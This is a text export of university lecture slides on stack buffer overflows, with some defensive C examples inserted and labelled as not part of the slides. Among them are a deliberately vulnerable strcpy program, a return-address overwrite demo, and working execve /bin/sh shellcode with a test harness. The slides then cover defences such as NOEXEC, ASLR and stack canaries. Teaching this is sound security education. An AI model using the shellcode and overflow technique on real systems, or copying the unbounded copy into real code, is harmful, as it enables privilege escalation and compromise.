8/14/2019 L4P3 Stack Overflow
1/31
Buffer Overflow Attack
PHAM VAN HAU ([email protected])
SCHOOL OF COMPUTER SCIENCE AND ENGINEERING, INTERNATIONAL UNIVERSITY
8/14/2019 L4P3 Stack Overflow
2/31
-
8/14/2019 L4P3 Stack Overflow
3/31
Memory Organization (1)
Text: program code (instructions)
Initialized/Uninitialized data: global, static variables
Stack: local variables
(Diagram: the three regions drawn along an axis labelled "memory address decreases".)
Stack operation
Stack: A stack is an abstract data type. A stack contains objects in which the last object placed on the stack will be the first object removed (last in, first out, or LIFO).
Two important operations of a stack are PUSH and POP.
PUSH adds an element at the top of the stack. POP removes the element at the top of the stack.
Assembly Example
Function:
void fun(int a, int b, int c) {
    char buffer1[5];
    char buffer2[10];
}
int main(void) {
    fun(1,2,3);
    return 0;
}
(Diagram: the same fun/main program, with the stack showing main's frame and then fun's frame after the call fun(1,2,3).)
Procedure prolog/epilog
Procedure prologue: save the previous FP, then copy SP into FP to create the new FP.
Procedure epilog: the stack must be cleaned up again
    movl %ebp,%esp
    popl %ebp
    ret
(Diagram: the prologue and epilogue marked in the function's assembly listing.)
Stack in function calling
High-level languages need functions and procedures; the stack helps to implement them.
The stack is used to dynamically allocate the local variables used in functions, to pass parameters to the functions, and to return values from the function.
Stack in action (for the fun(1,2,3) example above)
Stack frame of fun after the call, listed from the top of the stack toward increasing memory addresses:
    Top of stack
    Buffer2
    Buffer1
    Saved EBP
    Saved IP
    1  (a)
    2  (b)
    3  (c)
Buffer overflow in a nutshell
Compile: gcc -o vul1 vul1.c
./vul1         -> nothing happens
./vul1 hello   -> output = hello
Instead of hello, by giving suitable input we can modify the behavior of vul1, e.g. to spawn a shell.
Program: vul1.c
#include <stdio.h>
#include <string.h>
int main(int argc, char *argv[]) {
    char buffer[512];
    if (argc > 1) {
        strcpy(buffer, argv[1]);   /* unbounded copy: an argument longer than the buffer overflows it */
        printf("%s", buffer);
    }
    return 0;
}
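A hardened counterpart to vul1.c, added here as an example and not part of the original slides: the same program with the unbounded strcpy() replaced by a copy that refuses any argument that does not fit in the 512-byte buffer. The helper names copy_bounded() and accepts_input_of_length() are this example's own.

```c
#include <stdio.h>
#include <string.h>

#define BUF_SIZE 512   /* same buffer size as vul1.c */

/* Bounded replacement for strcpy(): copies src into dst only if the whole
 * string, including its terminating NUL, fits in dst_size bytes.
 * Returns 0 on success and -1 (writing nothing) if src is too long. */
int copy_bounded(char *dst, size_t dst_size, const char *src) {
    size_t n = 0;
    while (n < dst_size && src[n] != '\0')   /* never scan past dst_size */
        n++;
    if (n == dst_size)                        /* no NUL within dst_size: reject */
        return -1;
    memcpy(dst, src, n + 1);                  /* copy the string and its NUL */
    return 0;
}

/* Builds a constructed argument of `len` 'A' characters and reports (1/0)
 * whether copy_bounded() accepts it into a BUF_SIZE byte buffer. */
int accepts_input_of_length(size_t len) {
    char src[1024];
    char dst[BUF_SIZE];
    if (len >= sizeof src)
        len = sizeof src - 1;
    memset(src, 'A', len);
    src[len] = '\0';
    return copy_bounded(dst, sizeof dst, src) == 0;
}

/* vul1.c with the fix applied: over-long input is rejected, not copied. */
int main(int argc, char *argv[]) {
    char buffer[BUF_SIZE];
    if (argc > 1) {
        if (copy_bounded(buffer, sizeof buffer, argv[1]) != 0) {
            fprintf(stderr, "input too long (max %d bytes)\n", BUF_SIZE - 1);
            return 1;
        }
        printf("%s\n", buffer);
    }
    return 0;
}
```

The length check runs before any byte is written, so a 600-byte argument produces an error message instead of a write past the end of buffer; a 511-byte argument, the longest that fits with its NUL, is still accepted.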
Buffer overflow can redirect execution flow
#include <stdio.h>
void function(int a, int b, int c) {
    char buffer1[5];
    char buffer2[10];
    int *ret;
    ret = (int *)(buffer1 + 12);   /* assumes the saved IP sits 12 bytes past buffer1, as in the slide's 32-bit layout */
    (*ret) += 8;                   /* advance the saved return address by 8 bytes, skipping main's next instruction */
}
int main(void) {
    int x;
    x = 0;
    function(1,2,3);
    x = 1;
    printf("%d\n", x);
    return 0;
}
Demo: example{2,3}.c
Binary Code (1)
(Diagram: binary code beside its assembly code.)
int g;
int main(void) {
    int x;
    int y;
    int z;
    x = 1;
    y = 2;
    z = x + y;
    g = z;
    return 0;
}
Shellcode (1)
In most cases we'll simply want the program to spawn a shell, from where we can then issue other commands as we wish.
Place the code we are trying to execute in the buffer we are overflowing, and overwrite the return address so it points back into the buffer.
Shellcode (2)
Same frame as before, listed from the top of the stack toward increasing memory addresses, after the overflow:
    Top of stack
    Buffer2  (Shellcode)
    Buffer1  (Shellcode)
    Saved EBP
    Saved IP  (overwritten to point back into the buffer holding the shellcode)
    1
    2
    3
Code to open a shell (in C)
#include <unistd.h>
int main(int argc, char **argv) {
    char *name[2];
    name[0] = "/bin/sh";
    name[1] = NULL;
    execve(name[0], name, NULL);
    return 0;
}
Shellcode to open a shell
char shellcode[] =
    "\xeb\x1f\x5e\x89\x76\x08\x31\xc0\x88\x46\x07\x89\x46\x0c\xb0\x0b\x89\xf3\x8d\x4e\x08\x8d\x56\x0c\xcd\x80\x31\xdb\x89\xd8\x40\xcd\x80\xe8\xdc\xff\xff\xff/bin/sh";
Test the Shellcode
char shellcode[] =
    "\xeb\x1f\x5e\x89\x76\x08\x31\xc0\x88\x46\x07\x89\x46\x0c\xb0\x0b\x89\xf3\x8d\x4e\x08\x8d\x56\x0c\xcd\x80\x31\xdb\x89\xd8\x40\xcd\x80\xe8\xdc\xff\xff\xff/bin/sh";
int main(void) {
    int *ret;
    ret = (int *)&ret + 2;
    (*ret) = (int)shellcode;
    return 0;
}
Demo: testshellcode.c, Exploit1.c
Demo: Exploit1, Exploit2, Exploit3
Classification of buffer-overflow
Local buffer overflow: increase privilege on the local machine
Remote buffer overflow: gain access to a remote machine
Kernel-Enforced Protection (PaX Project)
Non-executable (NOEXEC): prevents the injection and execution of code into a task's address space. http://pax.grsecurity.net/docs/noexec.txt
The first feature NOEXEC implements is the executable semantics on memory pages: making all available executable memory, including the stack, heap and all anonymous mappings, non-executable.
Locking down of permissions on memory pages: prevent the creation of writable/executable file mappings (anonymous mappings are already made non-executable); we also refuse to turn a writable or non-executable mapping into an executable one and vice versa.
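To make the "writable or executable, never both" rule concrete, here is an added example (not PaX code) that reads mapping lines in the /proc/<pid>/maps format and flags any region that is both writable and executable, which is exactly the kind of mapping a NOEXEC-style policy refuses to create. The sample mapping lines are constructed, and the function names is_wx_mapping() and count_wx_mappings() are this example's own.

```c
#include <stdio.h>
#include <string.h>

/* One /proc/<pid>/maps line looks like:
 *   7ffd2c3e1000-7ffd2c402000 rw-p 00000000 00:00 0  [stack]
 * The second field is four characters: r, w, x and p/s (private/shared). */
static int parse_perms(const char *line, char perms[5]) {
    const char *sp = strchr(line, ' ');          /* skip the address range */
    if (!sp || strlen(sp + 1) < 4)
        return -1;
    memcpy(perms, sp + 1, 4);
    perms[4] = '\0';
    return 0;
}

/* Returns 1 if the mapping is writable AND executable (a W^X violation). */
int is_wx_mapping(const char *line) {
    char perms[5];
    if (parse_perms(line, perms) != 0)
        return 0;
    return perms[1] == 'w' && perms[2] == 'x';
}

/* Counts W^X violations in a block of maps text with '\n'-separated lines. */
int count_wx_mappings(const char *maps_text) {
    int violations = 0;
    const char *p = maps_text;
    while (*p) {
        const char *nl = strchr(p, '\n');
        size_t len = nl ? (size_t)(nl - p) : strlen(p);
        char line[512];
        if (len >= sizeof line)
            len = sizeof line - 1;              /* truncate over-long lines */
        memcpy(line, p, len);
        line[len] = '\0';
        if (is_wx_mapping(line))
            violations++;
        p = nl ? nl + 1 : p + len;
    }
    return violations;
}

/* Constructed sample: a normal layout plus one rwx anonymous mapping. */
const char SAMPLE_MAPS[] =
    "00400000-00401000 r-xp 00000000 08:01 1234 /home/user/vul1\n"
    "00600000-00601000 rw-p 00000000 08:01 1234 /home/user/vul1\n"
    "7f0000000000-7f0000021000 rwxp 00000000 00:00 0\n"
    "7ffd2c3e1000-7ffd2c402000 rw-p 00000000 00:00 0 [stack]\n";

int main(void) {
    printf("constructed sample: %d W+X mapping(s)\n",
           count_wx_mappings(SAMPLE_MAPS));
#ifdef __linux__
    /* Live check of the running process; under a NOEXEC-style policy this is 0. */
    FILE *f = fopen("/proc/self/maps", "r");
    if (f) {
        char line[512];
        int live = 0;
        while (fgets(line, sizeof line, f))
            live += is_wx_mapping(line);
        fclose(f);
        printf("this process: %d W+X mapping(s)\n", live);
    }
#endif
    return 0;
}
```

On the constructed sample only the anonymous rwxp region is reported; the text, data and stack mappings each carry at most one of the w and x bits. Running the live check on a process whose stack shows up as rwxp is a quick way to confirm that the kernel or loader has left the stack executable.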
Kernel-Enforced Protection (PaX Project)
Address Space Layout Randomization (ASLR): http://pax.grsecurity.net/docs/aslr.txt
Introducing randomness into the virtual memory layout for a particular process.
Varying levels of randomness during the process of loading a binary so that the binary mapping, dynamic library linking and stack memory regions are all randomized before the process begins executing.
8/14/2019 L4P3 Stack Overflow
26/31
-
8/14/2019 L4P3 Stack Overflow
27/31
-
8/14/2019 L4P3 Stack Overflow
28/31
StackGuard
StackGuard adds code at the RTL level to the function_prologue and function_epilogue functions within GCC to provide the generation and validation of the stack canary.
A random canary is placed directly before the return address.
If the canary changes, it means that there is stack smashing.
Defeating StackGuard
Possibility of bypassing StackGuard by overwriting local variables that could then be used to compromise the protection. Overwriting function pointers and frame pointers stored on the stack can also lead to compromise. Protection against non-stack-based attack vectors such as heap overflows is also beyond the scope of StackGuard.
(A Comparison of Buffer Overflow Prevention Implementations and Weaknesses)
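A user-space model of the canary check, added here as an example and not StackGuard's own code: a frame is laid out as buffer, canary, saved frame pointer, return address; a copy of the given length is made into the buffer; and an epilogue-style check reports whether the canary still holds its value. The canary constant, the placeholder saved-register values, the frame layout and the function names are this example's own assumptions.

```c
#include <stdint.h>
#include <stdio.h>
#include <string.h>

/* Model of a protected frame: the canary sits directly before the saved
 * frame pointer and return address, where StackGuard places it. */
struct frame {
    char     buffer[16];
    uint32_t canary;
    uint32_t saved_ebp;
    uint32_t saved_eip;
};

/* Constructed canary for this "run"; StackGuard picks a random one at start-up. */
#define CANARY_VALUE 0x9A1B2C3Du

/* Simulates a function that copies `len` bytes of `input` into its 16-byte
 * stack buffer with no bound on len (the bug), then runs the epilogue check.
 * Returns 1 if the canary was changed (stack smashing detected), else 0. */
int canary_check(const unsigned char *input, size_t len) {
    struct frame f;
    f.canary    = CANARY_VALUE;
    f.saved_ebp = 0xBFFFF400u;   /* constructed placeholder */
    f.saved_eip = 0x08048456u;   /* constructed placeholder */
    if (len > sizeof f)          /* keep the model inside its own object */
        len = sizeof f;
    memcpy((unsigned char *)&f, input, len);   /* an overflow reaches the canary first */
    return f.canary != CANARY_VALUE;           /* StackGuard aborts when this is true */
}

/* Convenience wrapper: a constructed input of `len` 'A' bytes. */
int smash_detected_for_length(size_t len) {
    unsigned char input[64];
    if (len > sizeof input)
        len = sizeof input;
    memset(input, 'A', len);
    return canary_check(input, len);
}

int main(void) {
    size_t lens[] = { 8, 16, 17, 24 };
    for (size_t i = 0; i < sizeof lens / sizeof lens[0]; i++)
        printf("copy of %2zu bytes: %s\n", lens[i],
               smash_detected_for_length(lens[i]) ? "canary changed, abort"
                                                  : "canary intact");
    return 0;
}
```

The check catches every copy that runs past the 16-byte buffer, because the canary is the first thing the overflow reaches before the saved frame pointer and return address. It does not cover locals placed between the buffer and the canary, which is the weakness the slide names and the reason ProPolice re-arranges the frame.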
ProPolice Stack-Smashing Protection (SSP)
SSP proactively monitors stack changes. SSP's approach re-arranges argument locations, return addresses, previous frame pointers and local variables. SSP has come up with the following safe stack model (diagram).
Defeating ProPolice SSP
ProPolice is better protection against stack overflows than the other compiler patches but still has problems. (A Comparison of Buffer Overflow Prevention Implementations and Weaknesses)
StackShield
On function entry the return address is copied to the Global Ret Stack; on return the return address is copied from the Global Ret Stack back to the application's stack, overwriting any possible compromise.
Defeating StackShield
Methods for defeating StackShield are similar to those used to bypass StackGuard protection.
Windows 2003 Stack Protection
Microsoft implemented a compiler-based protection solution to ensure that their products were secure out of the box. Microsoft's solution is very similar to Crispin Cowan's StackGuard covered earlier in this paper.
NGSEC StackDefender 1.10 works at the kernel level.
http://www.cvedetails.com/product/22318/Microsoft-Windows-8.html?vendor_id=26